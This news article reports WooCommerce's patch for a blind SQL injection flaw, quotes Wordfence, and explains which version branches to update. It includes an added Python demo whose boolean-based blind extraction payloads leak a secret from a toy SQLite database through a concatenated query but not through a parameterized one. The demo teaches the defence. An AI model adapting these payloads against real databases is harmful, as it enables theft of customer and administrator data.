Millions of users are affected by a critical vulnerability that WooCommerce has now patched. It affects publishers who use the WooCommerce plugin, and they are strongly encouraged to update if they have not already done so.
Because the flaw is a severe SQL injection vulnerability, WooCommerce automatically pushed the update to affected publishers.
Some publishers report that their sites have not yet received the update even though it is automatic. If a site is not yet on the latest release of its WooCommerce version branch, the publisher should update it manually.
SQL Injection Vulnerability:
An SQL injection is a vulnerability in which untrusted input is built into the text of a database query, so an attacker can alter the query itself rather than just the value it searches for. That lets the attacker make the database return data it should not reveal (a password hash, for instance), or change or delete data, without any legitimate access to it.
According to WooCommerce itself:
“If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information.” Wordfence stated that this is a Blind SQL Injection vulnerability.
“This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store’s database. The Wordfence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch.”
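The following is an added example, not WooCommerce's code or Wordfence's proof of concept, showing in miniature what the definition above and the Wordfence quote describe: a query that concatenates user input, the same query with a bound parameter, and a boolean-based blind extraction that reads a secret one character at a time using only a "rows found / no rows found" signal. The SQLite database, the `orders` and `options` tables and the `admin_token` row are all constructed for the demonstration and are not WooCommerce's real schema.

```python
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with constructed sample rows.

    The `orders` and `options` tables and the `admin_token` row are
    assumptions made for this demonstration, not WooCommerce's schema.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE orders (id INTEGER PRIMARY KEY, status TEXT, total REAL);
        INSERT INTO orders VALUES (1, 'completed', 19.99), (2, 'pending', 42.50);
        CREATE TABLE options (name TEXT, value TEXT);
        INSERT INTO options VALUES ('admin_token', 'S3cr3t');
        """
    )
    return conn


def count_orders_vulnerable(conn: sqlite3.Connection, status: str) -> int:
    """Vulnerable pattern: the caller's input is pasted into the SQL text,
    so a quote in the input changes the query instead of the value."""
    sql = "SELECT COUNT(*) FROM orders WHERE status = '" + status + "'"
    return conn.execute(sql).fetchone()[0]


def count_orders_safe(conn: sqlite3.Connection, status: str) -> int:
    """Hardened pattern: the input is bound as a parameter, so the database
    always treats it as a string value, never as SQL."""
    sql = "SELECT COUNT(*) FROM orders WHERE status = ?"
    return conn.execute(sql, (status,)).fetchone()[0]


def blind_extract(count_fn, conn: sqlite3.Connection, max_len: int = 16) -> str:
    """Boolean-based blind extraction against `count_fn`.

    The attacker never sees query results, only whether at least one
    order matched (count > 0). Appending a condition on one character of
    the secret at a time turns each true/false answer into one leaked
    character. A time-based variant would use a database delay instead
    of the row count as its signal (SQLite has no sleep function, so it
    is not shown here).
    """
    alphabet = string.ascii_letters + string.digits
    secret = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in alphabet:
            # Close the string literal, add the probe condition, and
            # comment out the trailing quote the application appends.
            payload = (
                "completed' AND (SELECT substr(value," + str(pos) + ",1) "
                "FROM options WHERE name='admin_token') = '" + ch + "' -- "
            )
            if count_fn(conn, payload) > 0:
                secret += ch
                found = True
                break
        if not found:
            break  # nothing matched: end of secret, or input was treated as data
    return secret


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", repr(blind_extract(count_orders_vulnerable, db)))
    print("parameterized query leaks:", repr(blind_extract(count_orders_safe, db)))
```

Run against the concatenated query the extraction recovers the whole constructed secret; against the parameterized query the same payloads are just strings that match no order, so nothing leaks. This is the reason a firewall rule can only reduce exposure while the real fix is in the query code.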
WooCommerce sites have not been compromised by widespread attacks. “Wordfence Threat Intelligence has found extremely limited evidence of these attempts and, likely, such attempts were highly targeted.”
A version branch is the major version number (the number before the first dot) of the WooCommerce release a publisher is running. A publisher may be on the current 5.x branch or still on an older 3.x or 4.x branch.
Each of those, 3, 4 and 5, is a branch of the software, and version 5 represents a major upgrade from version 4.
Publishers may find updating from version 4.x to 5.x disruptive.
To accommodate those publishers, WooCommerce released a patch for each branch rather than only for the latest one. In other words, a site running WooCommerce 4.8.x should update to at least 4.8.1, the patched release for that line, rather than having to jump to 5.x.
Although the patched releases of the older branches close the vulnerability, the official announcement recommends updating to the very latest version of WooCommerce, currently 5.5.1.
“we still highly recommend you ensure that you’re using the latest versions of WooCommerce and WooCommerce Blocks (5.5.1).”
Inadvertently, that statement may have caused a little confusion about how far up the version branch publishers should update.
Some publishers on version 4.x have wondered whether the patched 4.x release is safe or whether they should update to the latest version of WooCommerce, currently 5.5.1.